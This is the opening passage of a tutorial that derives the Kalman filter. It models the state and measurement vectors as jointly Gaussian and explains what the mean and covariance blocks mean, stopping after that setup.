Potential field migration is a rapid technique for imaging the subsurface based on gravity data. However, the migration transformation usually produces a smooth and unfocused image of the targets due to the diffusive nature of the potential fields. In this paper, we introduce a method of migration image enhancement and sharpening based on the application of a hybrid focusing stabilizer, which combines an edge-preserving smoothing filter with the minimum support functional. The method is based on the model resolution matrix of the migration operator. We also improve the migration image with a novel target-oriented migration method. The developed method of migration image enhancement and sharpening is illustrated by synthetic model studies and case studies. The case study involves imaging full tensor gravity gradient data collected in the Nordkapp Basin of the Barents Sea.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-20
Mohamed Hamdache, José A. Peláez

Abstract: We would like to make some comments on the paper by Hamidatou et al. (2019). These comments are motivated primarily by the fact that previous results on probabilistic seismic hazard analyses, some of them computed and published by our research group, are wrongly quoted in the paper by these authors. In our opinion, some other points are also worthy of debate, mainly, but not only, the seismic source zone model used, the logic tree used, and the comparison of estimated values of peak ground horizontal acceleration (PGA) with previous results.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-20
Alexandre Paris, Philippe Heinrich, Raphaël Paris, Stéphane Abadie

On the evening of December 22, 2018, the coasts of the Sunda Strait, Indonesia, were hit by a tsunami generated by the collapse of part of the Anak Krakatau volcano. Hundreds of people were killed, and thousands were injured and displaced. This paper presents a preliminary modeling of the volcano flank collapse and the tsunami it generated, based on the results of a 2D depth-averaged coupled model involving a granular rheology and Coulomb friction for the slide description, and dispersive effects for the water flow part. With a reconstructed total (subaerial and submarine) landslide volume of 150 million m³ inferred from pre- and post-collapse satellite and aerial images, the comparison of the simulated water waves with the observations (tide gauges located all around the strait, photographs and field surveys) is satisfactory. Due to the lack of information on the submarine part of the landslide, the reconstructed submarine slope is assumed to be approximately constant. A significant time delay in the results, particularly in Bandar Lampung Bay, could be attributed to imprecision in the bathymetric data.
The sensitivity to the basal friction and to dispersive effects is analyzed through numerical tests. Results show that the influence of the basal friction angle on the simulated wave heights decreases with distance, and that a value of 2° gives results consistent with the observations. The dispersive effects are assessed by comparing water waves simulated by a shallow water model and a Boussinesq model. Simulations with frequency dispersion produce longer wave periods and smaller wave amplitudes in the Sunda Strait, particularly in deep waters.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-20
C. H. Lin, Y. C. Lai, M. H. Shih, C. J. Lin, J. S. Ku, Y. C. Huang

A dense linear geophone array has been deployed across the Tatun volcano group (TVG) at the northern tip of Taiwan, close to the Taipei metropolis with its more than 7 million residents. The array is composed of 50 geophones with a station spacing of ~200 m on average, and it strikes in the NW–SE direction to record the many earthquakes in eastern Taiwan, where the Philippine Sea plate subducts beneath the Eurasian plate. Detailed examination of felt earthquakes shows that consistent P-wave delays are recorded at particular stations of the array. Further forward modeling indicates a low-velocity zone (LVZ) at depths between ~0.5 and ~2.5 km beneath the major fumarole sites. Combining this preliminary result with previous studies, including clustered seismicity, volcanic earthquakes, a low-resistivity zone, strong degassing processes and shallow velocity structures, we suggest that the LVZ might be associated with the major hydrothermal reservoir at the TVG. The identification of the hydrothermal reservoir via the LVZ not only implies a potential volcanic threat, such as phreatic eruptions, in the future, but also suggests the possibility of sustainable geothermal resources for replacing traditional nuclear and fossil fuel power plants. Detailed images of the LVZ and other volcanic structures will be obtained soon, when dense arrays with more than 600 geophones are deployed from 2020 to 2022.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-18
Alessandro Longo, Stefano Bianchi, Wolfango Plastino, Bartosz Idźkowski, Maciej Suchiński, Tomasz Bulik

Abstract: The local Hurst exponent H(t) has been computed for an array of 38 seismometers deployed at the Virgo West End Building for Newtonian Noise characterisation purposes. The analysed period is from January 31st, 2018 to February 5th, 2018. The Hurst exponent H is a fractal index quantifying the persistent behaviour of a time series, with higher H corresponding to higher persistency. The adopted methodology makes use of the local Hurst exponent computed in small sliding windows in order to characterise the properties of the seismometers. Hourly averages and averages of H(t) have been computed over the whole analysed period. Results show that seismometers placed on a concrete slab closer to the centre of the room systematically exhibit higher persistency than the ones not placed on it. Seismometers placed next to the outer walls also exhibit higher persistency. The seismometer placed on a thin metal plate instead exhibits very low values of persistency during the analysed period, compared to the rest of the array.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-18
Dewan Mohammad Enamul Haque, Nawar Wadud Khan, Md. Selim, A. S. M. Maksud Kamal, Sara Hanan Chowdhury

Abstract: This study aims to build on the existing knowledge and improve the overall PSHA results for Bangladesh by modifying the source, path and site characteristics. Firstly, six potential seismotectonic zones have been re-defined based on the recent studies of Wang et al. (J Geophys Res Solid Earth 119:3576–3822, 2014) and Nath and Thingbaijam (J Seismol 15(2):295–315, 2011), and the updated earthquake catalogue has been declustered using two methods. Important source parameters, such as recurrence b-values and maximum magnitudes, have been determined using the maximum likelihood and cumulative moment methods, respectively, and their uncertainties have been addressed using a logic-tree approach. Secondly, based on a literature review and studies in neighboring countries, suitable GMPEs have been selected for the seismic zones, and the uncertainties have again been addressed using a logic-tree approach. A significant novelty of the study lies in the consideration of site effects by integrating Vs30 values throughout the country. The ground motions, PGA and SA (at 0.2, 1.0 and 2.0 s), are computed using GEM's OpenQuake and presented in the form of hazard maps for 2% and 10% probabilities of exceedance in 50 years, as well as mean hazard curves and uniform hazard spectra. Disaggregation for the capital city Dhaka has also been carried out to show the hazard contributions of magnitude–distance pairs. The spatial distributions of PGA and SA are found to be remarkably higher than previous findings, likely due to differences in parameters and uncertainties. The results show a marked increase (by almost 20%) in the computed ground motions with respect to those obtained previously by uniformly characterizing the whole country as firm rock.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-17
Ignatius Ryan Pranantyo, Phil R. Cummins

We present an analysis of the oldest detailed account of tsunami run-up in Indonesia, that of the 1674 Ambon tsunami (Rumphius in Waerachtigh Verhael van de Schuckelijcke Aerdbebinge, BATAVIA, Dutch East Indies, 1675). At 100 m, this is the largest run-up height ever documented in Indonesia, and with over 2300 fatalities even in 1674, it ranks as one of Indonesia's most deadly tsunami disasters. We consider the plausible sources of earthquakes near Ambon that could generate a large, destructive tsunami, including the Seram Megathrust, the South Seram Thrust, and faults local to Ambon. We conclude that the only explanation for the extreme run-up observed on the north coast of Ambon is a tsunami generated by an earthquake-triggered coastal landslide. We use a two-layer tsunami model to show that a submarine landslide with an approximate volume of 1 km³, offshore the area on Ambon's northern coast between Seith and Hila where dramatic changes in the coastal landscape were observed, can explain the observed tsunami run-up along the coast. Thus, the 1674 Ambon tsunami adds weight to the evidence from recent tsunamis, including the 1992 Flores, 2018 Palu and Sunda Strait tsunamis, that landslides are an important source of tsunami hazard in Indonesia.

Updated: 2020-01-04

Contents have been reproduced by permission of the publishers.
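Several of the abstracts above (e.g., Haque et al. on the Bangladesh PSHA) estimate Gutenberg–Richter recurrence b-values by maximum likelihood. As a pointer for readers, here is a minimal Python sketch of the standard Aki–Utsu estimator; the catalogue below is made up purely for illustration, and the real studies add magnitude-of-completeness analysis and uncertainty treatment on top of this:

Code:
import math

def aki_utsu_b(mags, mc, dm=0.1):
    """Aki-Utsu maximum-likelihood b-value.

    mags: catalogue magnitudes at or above the completeness magnitude mc;
    dm:   magnitude binning width (Utsu's correction subtracts dm/2).
    """
    mean_m = sum(mags) / len(mags)
    return math.log10(math.e) / (mean_m - (mc - dm / 2))

# Hypothetical mini-catalogue, complete above Mw 4.0:
mags = [4.1, 4.3, 4.0, 5.2, 4.6, 4.0, 4.8, 4.2]
print(round(aki_utsu_b(mags, mc=4.0), 2))  # ~0.97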
2020-02-17 15:31:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4036889970302582, "perplexity": 2925.9919130519843}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875142603.80/warc/CC-MAIN-20200217145609-20200217175609-00311.warc.gz"}
https://web2.0calc.com/questions/permutations_8
# Permutations...

Guest, Jul 9, 2017

#1 You can put it into the calculator on the home page like this: npr(12,9)

But if you don't have a calculator that can do this.....

$$_nP_r=\frac{n!}{(n-r)!} \\~\\ _{12}P_9=\frac{12!}{(12-9)!} \\~\\ _{12}P_9=\frac{12!}{3!} \\~\\ _{12}P_9=\frac{12\,\cdot\,11\,\cdot\,10\,\cdot\,9\,\cdot\,8\,\cdot\,7\,\cdot\,6\,\cdot\,5\,\cdot\,4\,\cdot\,3!}{3!} \\~\\ _{12}P_9=12\,\cdot\,11\,\cdot\,10\,\cdot\,9\,\cdot\,8\,\cdot\,7\,\cdot\,6\,\cdot\,5\,\cdot\,4 \\~\\ _{12}P_9=79,833,600$$

hectictar, Jul 9, 2017
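For anyone who wants to script the same computation, here is a minimal Python sketch; the function name `npr` simply mirrors the calculator command quoted above and is my own choice, not a built-in:

```python
from math import factorial

def npr(n, r):
    # number of ordered arrangements of r items chosen from n
    return factorial(n) // factorial(n - r)

print(npr(12, 9))  # 79833600
```

Python 3.8 and later also ship this directly as `math.perm(12, 9)`.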
2018-05-23 20:52:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.949414849281311, "perplexity": 1645.9194036111933}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865809.59/warc/CC-MAIN-20180523200115-20180523220115-00063.warc.gz"}
https://www.mersenneforum.org/showthread.php?s=461be43cde549bf61c66f1275d30570c&t=9996&page=2
mersenneforum.org - Help needed for doublecheck sieving!

2008-02-17, 00:41 #12 mdettweiler, A Sunny Moo, Aug 2007, USA (GMT-5), 3·2,083 Posts
Quote (Originally Posted by AES): Is there a reason you're not using sr2sieve? I'll take 30e9 to 50e9
srsieve is generally faster when you have more than 60-70 k's in the sieve. Thanks for helping out!

2008-02-17, 00:58 #13 AES, Jul 2007, Tennessee, 2^5·19 Posts
You may want to test it on this sieve. I have similar hardware and with sr2...
64-bit will do 10e9 in less than 10 hours
32-bit will do 10e9 in less than 16 hours

2008-02-17, 01:24 #14 mdettweiler, A Sunny Moo, Aug 2007, USA (GMT-5), 3·2,083 Posts
Quote (Originally Posted by AES): You may want to test it on this sieve. I have similar hardware and with sr2... 64-bit will do 10e9 in less than 10 hours; 32-bit will do 10e9 in less than 16 hours
Hmm. Okay, I'll check it out. In the meantime, feel free to use either srsieve or sr2sieve, whichever one you find faster--they both produce compatible results, so it won't make any difference on my end.

2008-02-17, 07:31 #15 gd_barnes, May 2007, Kansas; USA, 5·2,017 Posts
It is possible that sr2sieve is now faster with 351 k's like this. It may also depend on the type of machine you're using. When I started the huge sieve for 400 2x n-min, it's a little more efficient to break off a large chunk while continuing to sieve the higher n-ranges but personally, I don't think it's worth messing with at these lower n-ranges. In the meantime, Anon, can you run an LLR test on your machine for a candidate around n=212K? That'll give a removal rate to shoot for on a comparable machine. After 300

2008-02-17, 13:40 #16 Flatlander, "I quite division it", "Chris", Feb 2005, England, 2077₁₀ Posts
To use sr2sieve do I just download it and change "srsieve" in the .bat file?
Last fiddled with by Flatlander on 2008-02-17 at 13:41

2008-02-17, 14:29 #17 mdettweiler, A Sunny Moo, Aug 2007, USA (GMT-5), 3×2,083 Posts
Quote (Originally Posted by Flatlander): To use sr2sieve do I just download it and change "srsieve" in the .bat file?
No, its command line switches are a little different. Your .bat file will need to look like this:
Code: sr2sieve -p 10e9 -P 20e9 -i nplb-doublecheck-sieve_10G.txt
Other than that, it's pretty much the same.
Last fiddled with by mdettweiler on 2008-02-17 at 14:29

2008-02-17, 14:33 #18 mdettweiler, A Sunny Moo, Aug 2007, USA (GMT-5), 1100001101001₂ Posts
Quote (Originally Posted by gd_barnes): It is possible that sr2sieve is now faster with 351 k's like this. It may also depend on the type of machine you're using. When I started the huge sieve for 400
I'll try that sometime today.
Quote (Originally Posted by gd_barnes): BTW, the estimated optimum of 550G was an 'extrapolated' guess. It assumed that an LLR test of a candidate at n=212K (70% of the n-range of n=100K-260K) took 60 secs. and it took into account the removal rate that Anon was getting on his machine at P=~19G. I didn't actually run the test. Anon or whomever, as we get past P=~200G, we'll see if we can nail down a better estimated optimum sieve depth. Technically with n-max being > 2x n-min, it's a little more efficient to break off a large chunk while continuing to sieve the higher n-ranges but personally, I don't think it's worth messing with at these lower n-ranges. In the meantime, Anon, can you run an LLR test on your machine for a candidate around n=212K? That'll give a removal rate to shoot for on a comparable machine.
Okay, I'll do that soon.
Quote (Originally Posted by gd_barnes): After 300
Okay, cool. Anon
Last fiddled with by mdettweiler on 2008-02-17 at 14:33

2008-02-17, 18:13 #19 Flatlander, "I quite division it", "Chris", Feb 2005, England, 4035₈ Posts
20G-30G finished. Taking 50G-70G.
srsieve 130,000 p/sec (20G-30G)
sr2sieve 230,000 p/sec (50G-70G)
Last fiddled with by Flatlander on 2008-02-17 at 18:30

2008-02-17, 18:49 #20 mdettweiler, A Sunny Moo, Aug 2007, USA (GMT-5), 1869₁₆ Posts
Quote (Originally Posted by Flatlander): 20G-30G finished. Taking 50G-70G. srsieve 130,000 p/sec (20G-30G); sr2sieve 230,000 p/sec (50G-70G)
Oh, wow! I'll change the instructions in the first post so that they tell people to use sr2sieve. I'll also update the sieve file archive to include the updated batch file and shell script.

2008-02-17, 19:05 #21 mdettweiler, A Sunny Moo, Aug 2007, USA (GMT-5), 6249₁₀ Posts
Okay, I updated the first post in this thread to reflect the change to sr2sieve. The instructions are significantly different, so you'll want to read them again.

2008-02-17, 20:24 #22 Flatlander, "I quite division it", "Chris", Feb 2005, England, 31·67 Posts
I'm already running this:
Quote: sr2sieve -p 50e9 -P 70e9 -i nplb-doublecheck-sieve_10G.txt
is that ok?
2020-03-31 10:38:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.34169942140579224, "perplexity": 12401.689178503355}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370500426.22/warc/CC-MAIN-20200331084941-20200331114941-00332.warc.gz"}
http://www.chegg.com/homework-help/questions-and-answers/gears-importantcomponents-mechanical-devices-mechanical-clocks-tobicycles-fact-present-mot-q145443
## A Simple Gear System

Gears are important components in many mechanical devices, from mechanical clocks to bicycles. In fact, they are present whenever a motor produces rotational motion. An example of a simple gear system is shown in the figure. The bigger wheel (wheel 1) has radius $r_1$, while the smaller one (wheel 2) has radius $r_2$. The two wheels have small teeth and are connected through a metal chain so that when wheel 1 rotates, the chain moves with it and causes wheel 2 to rotate as well.

Part A: Let wheel 1 rotate at a constant angular speed $\omega_1$. Find the ratio $\omega_1/\omega_2$ of the angular speed of wheel 1 to the angular speed of wheel 2. Express your answer in terms of any or all of the variables $r_1$ and $r_2$.

Part B: The rotation of wheel 1 is caused by a torque. Find the ratio $\tau_1/\tau_2$ of the torque acting on wheel 1 to the torque acting on wheel 2. Express your answer in terms of any or all of the variables $r_1$ and $r_2$.

Part C: If the power needed to rotate wheel 1 is $P_1$, what is the ratio $P_1/P_2$ of the power of wheel 1 to the power of wheel 2? Express your answer in terms of any or all of the variables $r_1$ and $r_2$.

• Part A: $r_2/r_1$; Part B: $r_1/r_2$; Part C: $1$; Part D: $15.0$; Part E: The torque exerted on the rear gear wheel increases.
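A quick way to see all three answers: the chain has a single linear speed $v$ and a single tension $F$, so $v = \omega_1 r_1 = \omega_2 r_2$ and $\tau_i = F r_i$. The following Python sketch checks the ratios numerically; the radii, speed and tension values are made up purely for illustration:

```python
r1, r2 = 0.30, 0.10       # wheel radii in meters (illustrative values)
w1 = 5.0                  # angular speed of wheel 1 in rad/s (illustrative)
F = 12.0                  # chain tension in newtons (illustrative)

w2 = w1 * r1 / r2         # shared chain speed: w1*r1 == w2*r2
t1, t2 = F * r1, F * r2   # torque = chain tension times radius

print(w1 / w2, r2 / r1)          # both ~0.333: angular-speed ratio is r2/r1
print(t1 / t2, r1 / r2)          # both 3.0: torque ratio is r1/r2
print((t1 * w1) / (t2 * w2))     # 1.0: both wheels transmit the same power
```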
2013-05-25 09:01:08
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8015581965446472, "perplexity": 2114.6873878448896}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705884968/warc/CC-MAIN-20130516120444-00093-ip-10-60-113-184.ec2.internal.warc.gz"}
http://www.encyclopediaofmath.org/index.php/Baily%e2%80%93Borel_compactification
# Baily-Borel compactification Satake–Baily–Borel compactification Let be a semi-simple linear algebraic group (cf. also Semi-simple algebraic group) defined over , meaning that can be embedded as a subgroup of such that each element is diagonalizable (cf. also Diagonalizable algebraic group), and that the equations defining as an algebraic variety have coefficients in (and that the group operation is an algebraic morphism). Further, suppose contains a torus (cf. Algebraic torus) that splits over (i.e., has -rank at least one), and is of Hermitian type, so that can be given a complex structure with which it becomes a symmetric domain, where denotes the real points of and is a maximal compact subgroup. Finally, let be an arithmetic subgroup (cf. Arithmetic group) of , commensurable with the integer points of . Then the arithmetic quotient is a normal analytic space whose Baily–Borel compactification, also sometimes called the Satake–Baily–Borel compactification, is a canonically determined projective normal algebraic variety , defined over , in which is Zariski-open (cf. also Zariski topology) [a1] [a2] [a15] [a16]. To describe in the complex topology, first note that the Harish–Chandra realization [a6] of as a bounded symmetric domain may be compactified by taking its topological closure. Then a rational boundary component of is a boundary component whose stabilizer in is defined over ; based on a detailed analysis of the -roots and -roots of , there is a natural bijection between the rational boundary components of and the proper maximal parabolic subgroups of defined over . Let denote the union of with all its rational boundary components. Then (cf. [a18]) there is a unique topology, the Satake topology, on such that the action of extends continuously and with its quotient topology compact and Hausdorff. It also follows from the construction that is a finite disjoint union of the form where for some rational boundary component of , and is the intersection of with the stabilizer of . In addition, and each has a natural structure as a normal analytic space; the closure of any is the union of with some s of strictly smaller dimension; and it can be proved that every point has a fundamental system of neighbourhoods such that is connected for every . In order to describe the structure sheaf of (cf. also Scheme) with which it becomes a normal analytic space and a projective variety, define an -function on an open subset to be a continuous complex-valued function on whose restriction to is analytic, , where . Then, associating to each open the -module of -functions on determines the sheaf of germs of -functions. Further, for each the sheaf of germs of restrictions of -functions to is the structure sheaf of . Ultimately it is proved [a2] that is a normal analytic space which can be embedded in some complex projective space as a projective, normal algebraic variety. The proof of this last statement depends on exhibiting that in the collection of -functions there are enough automorphic forms for , more specifically, Poincaré-Eisenstein series, which generalize both Poincaré series and Eisenstein series (cf. also Theta-series), to separate points on as well as to provide a projective embedding. ## Contents ### History and examples. The simplest example of a Baily–Borel compactification is when , and , and is the complex upper half-plane, on which in acts by . (The bounded realization of is a unit disc, to which the upper half-plane maps by .) 
The properly discontinuous action of on extends to , and is a smooth projective curve. Since has -rank one, is a finite set of points, referred to as cusps. Historically the next significant example was for the Siegel modular group, with , and , and consisting of symmetric complex matrices with positive-definite imaginary part; here in acts on by . I. Satake [a17] was the first to describe a compactification of as endowed with its Satake topology (cf. also Satake compactification). Then Satake, H. Cartan and others (in [a19]) and W.L. Baily [a13] further investigated and exhibited the analytic and algebraic structure of , using automorphic forms as mentioned above. Baily [a14] also treated the Hilbert–Siegel modular group, where for a totally real number field . In the meanwhile, under only some mild assumption about , Satake [a18] constructed with its Satake topology, while I.I. Piateckii-Shapiro [a10] described a normal analytic compactification whose topology was apparently weaker than that of the Baily–Borel compactification. Later, P. Kiernan [a7] showed that the topology defined by Piateckii-Shapiro is homeomorphic to the Satake topology used by Baily and Borel. ### Other compactifications. Other approaches to the compactification of arithmetic quotients of symmetric domains to which the Satake and Baily–Borel approach may be compared are the Borel–Serre compactification [a3], see the discussion in [a20], and the method of toroidal embeddings [a12]. ### Cohomology. Zucker's conjecture [a21] that the (middle perversity) intersection cohomology [a4] (cf. also Intersection homology) of the Baily–Borel compactification coincides with its -cohomology, has been given two independent proofs (see [a8] and [a11]); see also the discussion and bibliography in [a5]. ### Arithmetic and moduli. In many cases has an interpretation as the moduli space for some family of Abelian varieties (cf. also Moduli theory), usually with some additional structure; this leads to the subject of Shimura varieties (cf. also Shimura variety), which also addresses arithmetic questions such as the field of definition of and . Geometrically, the strata of parameterize different semi-Abelian varieties, i.e., semi-direct products of algebraic tori with Abelian varieties, into which the Abelian varieties represented by points on degenerate. For an example see [a9], where this is thoroughly worked out for -forms of , especially for . #### References [a1] W.L. Baily, Jr., A. Borel, "On the compactification of arithmetically defined quotients of bounded symmetric domains" Bull. Amer. Math. Soc. , 70 (1964) pp. 588–593 [a2] W.L. Baily, Jr., A. Borel, "Compactification of arithmetic quotients of bounded symmetric domains" Ann. of Math. (2) , 84 (1966) pp. 442–528 [a3] A. Borel, J.P. Serre, "Corners and arithmetic groups" Comment. Math. Helv. , 48 (1973) pp. 436–491 [a4] M. Goresky, R. MacPherson, "Intersection homology, II" Invent. Math. , 72 (1983) pp. 135–162 [a5] M. Goresky, "-cohomology is intersection cohomology" R.P. Langlands (ed.) D. Ramakrishnan (ed.) , The Zeta Functions of Picard Modular Surfaces , Publ. CRM (1992) pp. 47–63 [a6] Harish-Chandra, "Representations of semi-simple Lie groups. VI" Amer. J. Math. , 78 (1956) pp. 564–628 [a7] P. Kiernan, "On the compactifications of arithmetic quotients of symmetric spaces" Bull. Amer. Math. Soc. , 80 (1974) pp. 109–110 [a8] E. Looijenga, "-cohomology of locally symmetric varieties" Computers Math. , 67 (1988) pp. 
3–20 [a9] "The zeta functions of Picard modular surfaces" R.P. Langlands (ed.) D. Ramakrishnan (ed.) , Publ. CRM (1992) [a10] I.I. Piateckii-Shapiro, "Arithmetic groups in complex domains" Russian Math. Surveys , 19 (1964) pp. 83–109 Uspekhi Mat. Nauk. , 19 (1964) pp. 93–121 [a11] L. Saper, M. Stern, "-cohomology of arithmetic varieties" Ann. of Math. , 132 : 2 (1990) pp. 1–69 [a12] A. Ash, D. Mumford, M. Rapoport, Y. Tai, "Smooth compactifications of locally symmetric varieties" , Math. Sci. Press (1975) [a13] W.L. Baily, Jr., "On Satake's compactification of " Amer. J. Math. , 80 (1958) pp. 348–364 [a14] W.L. Baily, Jr., "On the Hilbert–Siegel modular space" Amer. J. Math. , 81 (1959) pp. 846–874 [a15] W.L. Baily, Jr., "On the orbit spaces of arithmetic groups" , Arithmetical Algebraic Geometry (Proc. Conf. Purdue Univ., 1963) , Harper and Row (1965) pp. 4–10 [a16] W.L. Baily, Jr., "On compactifications of orbit spaces of arithmetic discontinuous groups acting on bounded symmetric domains" , Algebraic Groups and Discontinuous Subgroups , Proc. Symp. Pure Math. , 9 , Amer. Math. Soc. (1966) pp. 281–295 [a17] I. Satake, "On the compactification of the Siegel space" J. Indian Math. Soc. (N.S.) , 20 (1956) pp. 259–281 MR0084842 Zbl 0072.30002 [a18] I. Satake, "On compactifications of the quotient spaces for arithmetically defined discontinuous groups" Ann. of Math. , 72 : 2 (1960) pp. 555–580 MR0170356 Zbl 0146.04701 [a19] "Fonctions automorphes" , Sém. H. Cartan 10ième ann. (1957/8) , 1–2 , Secr. Math. Paris (1958) (Cartan) [a20] S. Zucker, "Satake compactifications" Comment. Math. Helv. , 58 (1983) pp. 312–343 MR0705539 Zbl 0565.22009 [a21] S. Zucker, "-cohomology of warped products and arithmetic groups" Ann. of Math. , 70 (1982) pp. 169–218 MR0684171 Zbl 0508.20020 How to Cite This Entry: Baily–Borel compactification. Encyclopedia of Mathematics. URL: http://www.encyclopediaofmath.org/index.php?title=Baily%E2%80%93Borel_compactification&oldid=23760
2013-05-22 04:47:18
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9395282864570618, "perplexity": 1385.7286984502982}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368701314683/warc/CC-MAIN-20130516104834-00076-ip-10-60-113-184.ec2.internal.warc.gz"}
https://biro.ai/kf-derivation/
# Deriving the Kalman Filter

October 05, 2020 Mark Liu

## Intro

Let's use the random vector $x$ to represent an uncertain state, and the random vector $z$ to represent an uncertain measurement. Even before making any actual measurements, we should have a prior idea of the likelihoods of different values of the combined vector $\begin{bmatrix} x\\ z \end{bmatrix}$. These are subjective assessments of the following sort.

• The value of $x$ is probably close to the known vector $a$
• The value of $z$ will probably turn out to be close to the known vector $b$
• The value of $z$ is probably close to $F x$, where $F$ is a known matrix

To encode these prior subjective beliefs numerically, we can say that $\begin{bmatrix} x\\ z \end{bmatrix}$ is distributed as a Gaussian random variable. $\begin{bmatrix} x\\ z \end{bmatrix} \sim N(\begin{bmatrix} \mu_x\\ \mu_z \end{bmatrix}, \begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix})$

• $\Sigma_{xx}$ describes how close we believe $x$ is to $\mu_x$.
• $\Sigma_{zz}$ describes how close we believe $z$ will be to $\mu_z$.
• $\Sigma_{xz} = \Sigma_{zx}^T$ describes how correlated we think $z$ and $x$ are.

